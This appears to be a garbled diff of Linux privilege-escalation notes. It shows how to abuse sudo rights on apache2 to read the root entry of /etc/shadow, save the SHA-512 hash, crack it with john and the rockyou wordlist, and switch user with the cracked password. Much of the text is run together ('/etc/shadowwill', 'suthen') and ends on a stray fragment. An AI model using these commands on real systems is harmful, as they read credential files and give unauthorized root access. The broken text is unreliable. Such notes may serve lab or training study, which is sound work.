Environmental Variables

 - For example if run

-and see apache2. - By providing apache2 with a config file:
+sudo -land see apache2. - By providing apache2 with a config file:

-will throw you the full line 1 which is usually root. - Save the hash:
+sudo apache2 -f /etc/shadowwill throw you the full line 1 which is usually root. - Save the hash:

-echo '$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVl aXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0' > hash.txt
+echo '$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVl aXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0' > hash.txt - Crack using john:

-john --format=sha512crypt --wordlist=/usr/share/seclists/rockyou.txt hash.txt
+john --format=sha512crypt --wordlist=/usr/share/seclists/rockyou.txt hash.txt suthen type in cracked password.

 ALL:ALL as another user